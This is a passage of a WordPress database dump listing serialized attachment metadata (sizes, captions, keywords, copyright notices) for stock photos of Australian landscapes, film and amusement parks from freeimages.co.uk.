"credit\";s:20:\"www.freeimages.co.uk\";s:6:\"camera\";s:10:\"NIKON D700\";s:7:\"caption\";s:127:\"Close up detail of a roll of 35mm film viewed from a high angle showing the coils of the reel and sprockets , isolated on white\";s:17:\"created_timestamp\";s:10:\"1335449664\";s:9:\"copyright\";s:46:\"www.freeimages.co.uk see site for terms of use\";s:12:\"focal_length\";s:3:\"105\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:38:\"Close up detail of a roll of 35mm film\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:15:{i:0;s:8:\"abstract\";i:1;s:10:\"background\";i:2;s:4:\"film\";i:3;s:11:\"perforation\";i:4;s:11:\"photography\";i:5;s:5:\"35 mm\";i:6;s:8:\"obsolete\";i:7;s:13:\"old fashioned\";i:8;s:16:\"white background\";i:9;s:7:\"exposed\";i:10;s:8:\"close up\";i:11;s:8:\"artistic\";i:12;s:10:\"creativity\";i:13;s:9:\"equipment\";i:14;s:3:\"art\";}}}'),(281,109,'_wp_attached_file','2017/10/39-bubbles10015.jpg'),(282,109,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2307;s:6:\"height\";i:3500;s:4:\"file\";s:27:\"2017/10/39-bubbles10015.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"39-bubbles10015-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"39-bubbles10015-198x300.jpg\";s:5:\"width\";i:198;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"39-bubbles10015-768x1165.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1165;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"39-bubbles10015-675x1024.jpg\";s:5:\"width\";i:675;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:28:\"39-bubbles10015-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:27:\"39-bubbles10015-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:27:\"39-bubbles10015-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:27:\"39-bubbles10015-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:26:\"39-bubbles10015-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:20:\"www.freeimages.co.uk\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:91:\"Extreme close up of abstract background composed of thick green and red liquid with bubbles\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:84:\"www.freeimages.co.uk - see http://www.freeimages.co.uk/terms.htm for license details\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:40:\"Extreme close up of green and red liquid\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:10:{i:0;s:10:\"background\";i:1;s:7:\"bubbles\";i:2;s:6:\"colors\";i:3;s:5:\"green\";i:4;s:6:\"liquid\";i:5;s:5:\"macro\";i:6;s:3:\"red\";i:7;s:8:\"abstract\";i:8;s:5:\"fluid\";i:9;s:8:\"colorful\";}}}'),(283,110,'_wp_attached_file','2017/10/12_apostles_coast-1.jpg'),(284,110,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3500;s:6:\"height\";i:2329;s:4:\"file\";s:31:\"2017/10/12_apostles_coast-1.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"12_apostles_coast-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"12_apostles_coast-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"12_apostles_coast-1-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"12_apostles_coast-1-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:32:\"12_apostles_coast-1-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:31:\"12_apostles_coast-1-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:31:\"12_apostles_coast-1-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:31:\"12_apostles_coast-1-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:30:\"12_apostles_coast-1-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:21:\"photoeverywhere.co.uk\";s:6:\"camera\";s:10:\"NIKON D700\";s:7:\"caption\";s:118:\"People watching sunset at viewpoint by Twelve Apostles limestone rock formation, Great Ocean Road, Victoria, Australia\";s:17:\"created_timestamp\";s:10:\"1318490677\";s:9:\"copyright\";s:99:\"www.freeimages.co.uk see site for terms of use, provided with permission from photoeverywhere.co.uk\";s:12:\"focal_length\";s:2:\"20\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:36:\"Twelve Apostles at sunset, Australia\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:19:{i:0;s:5:\"beach\";i:1;s:5:\"coast\";i:2;s:10:\"formations\";i:3;s:10:\"geological\";i:4;s:9:\"limestone\";i:5;s:4:\"rock\";i:6;s:3:\"sea\";i:7;s:6:\"stacks\";i:8;s:9:\"viewpoint\";i:9;s:5:\"sunet\";i:10;s:6:\"sunset\";i:11;s:10:\"silhouette\";i:12;s:9:\"australia\";i:13;s:15:\"twelve apostles\";i:14;s:8:\"tourists\";i:15;s:11:\"12 apostles\";i:16;s:16:\"viewing platform\";i:17;s:8:\"tourists\";i:18;s:6:\"sunset\";}}}'),(285,111,'_wp_attached_file','2017/10/40-threesisters20049.jpg'),(286,111,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2281;s:6:\"height\";i:1536;s:4:\"file\";s:32:\"2017/10/40-threesisters20049.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"40-threesisters20049-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"40-threesisters20049-300x202.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:202;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"40-threesisters20049-768x517.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:517;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"40-threesisters20049-1024x690.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:690;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:33:\"40-threesisters20049-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:32:\"40-threesisters20049-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:32:\"40-threesisters20049-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:32:\"40-threesisters20049-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:31:\"40-threesisters20049-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:20:\"www.freeimages.co.uk\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:145:\"Scenic landscape view from a viewing point of the Three sisters rock formation, NSW, Australia overlooking distant valleys veiled in mist or haze\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:46:\"www.freeimages.co.uk see site for terms of use\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:44:\"Three sisters rock formation, NSW, Australia\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:15:{i:0;s:9:\"australia\";i:1;s:14:\"blue mountains\";i:2;s:4:\"bush\";i:3;s:7:\"canyons\";i:4;s:5:\"green\";i:5;s:4:\"haze\";i:6;s:8:\"look out\";i:7;s:15:\"new south wales\";i:8;s:8:\"panorama\";i:9;s:14:\"rock formation\";i:10;s:5:\"rocks\";i:11;s:13:\"three sisters\";i:12;s:5:\"trees\";i:13;s:4:\"view\";i:14;s:5:\"vista\";}}}'),(287,112,'_wp_attached_file','2017/10/41-darlingharbour1.jpg'),(288,112,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2300;s:6:\"height\";i:1536;s:4:\"file\";s:30:\"2017/10/41-darlingharbour1.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"41-darlingharbour1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"41-darlingharbour1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"41-darlingharbour1-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"41-darlingharbour1-1024x684.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:684;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:31:\"41-darlingharbour1-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:30:\"41-darlingharbour1-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:30:\"41-darlingharbour1-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:30:\"41-darlingharbour1-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:29:\"41-darlingharbour1-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:20:\"www.freeimages.co.uk\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:101:\"Darling harbour, Sydney, Australia with the Prymont Bridge and buildings of the CBD in the background\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:46:\"www.freeimages.co.uk see site for terms of use\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:34:\"Darling harbour, Sydney, Australia\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:15:{i:0;s:9:\"australia\";i:1;s:8:\"blue sky\";i:2;s:6:\"bridge\";i:3;s:9:\"buildings\";i:4;s:3:\"cbd\";i:5;s:25:\"central business district\";i:6;s:12:\"centre point\";i:7;s:9:\"cityscape\";i:8;s:8:\"commerce\";i:9;s:15:\"darling harbour\";i:10;s:7:\"harbour\";i:11;s:14:\"prymont bridge\";i:12;s:9:\"sky tower\";i:13;s:6:\"sydney\";i:14;s:5:\"water\";}}}'),(289,113,'_wp_attached_file','2017/10/43-cammotree.jpg'),(290,113,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1536;s:6:\"height\";i:2338;s:4:\"file\";s:24:\"2017/10/43-cammotree.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"43-cammotree-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"43-cammotree-197x300.jpg\";s:5:\"width\";i:197;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"43-cammotree-768x1169.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"43-cammotree-673x1024.jpg\";s:5:\"width\";i:673;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:25:\"43-cammotree-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:24:\"43-cammotree-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:24:\"43-cammotree-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:24:\"43-cammotree-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:23:\"43-cammotree-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:20:\"www.freeimages.co.uk\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:97:\"Trunk of an Australian gum tree, or eucalyptus, in close up detail against a clear sunny blue sky\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:46:\"www.freeimages.co.uk see site for terms of use\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:31:\"Trunk of an Australian gum tree\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:12:{i:0;s:9:\"australia\";i:1;s:4:\"bark\";i:2;s:8:\"blue sky\";i:3;s:4:\"bush\";i:4;s:5:\"cammo\";i:5;s:3:\"gum\";i:6;s:8:\"gum tree\";i:7;s:6:\"nature\";i:8;s:3:\"sun\";i:9;s:4:\"tree\";i:10;s:6:\"nature\";i:11;s:7:\"outdoor\";}}}'),(291,114,'_wp_attached_file','2017/10/45-campcove.jpg'),(292,114,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2300;s:6:\"height\";i:1536;s:4:\"file\";s:23:\"2017/10/45-campcove.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"45-campcove-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"45-campcove-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"45-campcove-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"45-campcove-1024x684.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:684;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:24:\"45-campcove-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:23:\"45-campcove-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:23:\"45-campcove-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:23:\"45-campcove-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:22:\"45-campcove-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:20:\"www.freeimages.co.uk\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:50:\"a view of camp cove, sydney harbour on a sunny day\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:46:\"www.freeimages.co.uk see site for terms of use\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:9:\"camp cove\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:14:{i:0;s:6:\"sydney\";i:1;s:13:\"inner harbour\";i:2;s:5:\"beach\";i:3;s:4:\"swim\";i:4;s:3:\"sun\";i:5;s:10:\"blue water\";i:6;s:13:\"city distance\";i:7;s:5:\"grass\";i:8;s:5:\"trees\";i:9;s:9:\"sandstone\";i:10;s:11:\"urban peace\";i:11;s:9:\"tranquill\";i:12;s:15:\"sunday get away\";i:13;s:9:\"camp cove\";}}}'),(293,115,'_wp_attached_file','2017/10/amusmentpark2377.jpg'),(294,115,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1099;s:4:\"file\";s:28:\"2017/10/amusmentpark2377.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"amusmentpark2377-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"amusmentpark2377-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"amusmentpark2377-768x528.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:528;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"amusmentpark2377-1024x703.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:703;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:29:\"amusmentpark2377-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:28:\"amusmentpark2377-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:28:\"amusmentpark2377-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:28:\"amusmentpark2377-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:27:\"amusmentpark2377-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:130:\"a text credit and or hyperlink to our site is required if you use this image. Please visit http://www.freeimages.co.uk for details\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:26:\"freeimages.co.uk buildings\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(295,116,'_wp_attached_file','2017/10/amusmentpark2379.jpg'),(296,116,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1030;s:4:\"file\";s:28:\"2017/10/amusmentpark2379.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"amusmentpark2379-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"amusmentpark2379-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"amusmentpark2379-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"amusmentpark2379-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:29:\"amusmentpark2379-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:28:\"amusmentpark2379-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:28:\"amusmentpark2379-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:28:\"amusmentpark2379-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:27:\"amusmentpark2379-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:130:\"a text credit and or hyperlink to our site is required if you use this image. Please visit http://www.freeimages.co.uk for details\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:26:\"freeimages.co.uk buildings\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(297,117,'_wp_attached_file','2017/10/amusmentpark2380.jpg'),(298,117,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:28:\"2017/10/amusmentpark2380.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"amusmentpark2380-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"amusmentpark2380-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"amusmentpark2380-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"amusmentpark2380-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:29:\"amusmentpark2380-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:28:\"amusmentpark2380-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:28:\"amusmentpark2380-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:28:\"amusmentpark2380-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:27:\"amusmentpark2380-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:130:\"a text credit and or hyperlink to our site is required if you use this image. Please visit http://www.freeimages.co.uk for details\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:26:\"freeimages.co.uk buildings\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(299,118,'_wp_attached_file','2017/10/amusmentpark2381.jpg'),(300,118,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:627;s:6:\"height\";i:1156;s:4:\"file\";s:28:\"2017/10/amusmentpark2381.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"amusmentpark2381-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"amusmentpark2381-163x300.jpg\";s:5:\"width\";i:163;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"amusmentpark2381-555x1024.jpg\";s:5:\"width\";i:555;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:28:\"amusmentpark2381-627x450.jpg\";s:5:\"width\";i:627;s:6:\"height\";i:450;s:9:\